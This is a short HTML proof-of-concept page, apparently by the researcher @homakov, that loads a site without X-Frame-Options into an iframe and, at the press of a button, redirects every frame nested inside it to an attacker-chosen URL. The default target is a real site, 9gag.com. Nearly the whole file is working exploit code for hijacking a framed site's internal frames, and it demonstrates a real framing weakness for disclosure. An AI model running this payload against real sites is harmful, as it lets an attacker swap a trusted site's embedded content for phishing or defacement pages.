pwn_frame.html

<html>
  <head>
    <script>
    var pwn_url = 'data:text/html,PWNED BY @homakov'
    var pwn_url = 'http://homakov.blogspot.com'
    var go = function(){
      for(var i=0, l=frames[0].frames.length;i<l;i++){
        frames[0].frames[i].location.replace(pwn_url);
      }
      alert(l+' frames were replaced');
    }
    var load = function(){
      frames[0].location=target.value;
      frames[0].onload=function(){
        alert('now press PWN');
      }
    }
    </script>
  </head>
  <body>
  	Just load URL w/o X-Frame-Options and containing some internal frames. I will pwn 'em. <br>
    <input placeholder="" value="http://9gag.com" id="target"><a href="javascript:load()">LOAD</a> | <a href="javascript:go()">PWN INTERNAL FRAMES</a><br>
    <iframe width="600px" height="600px" id="mng"></iframe>
  </body>
</html>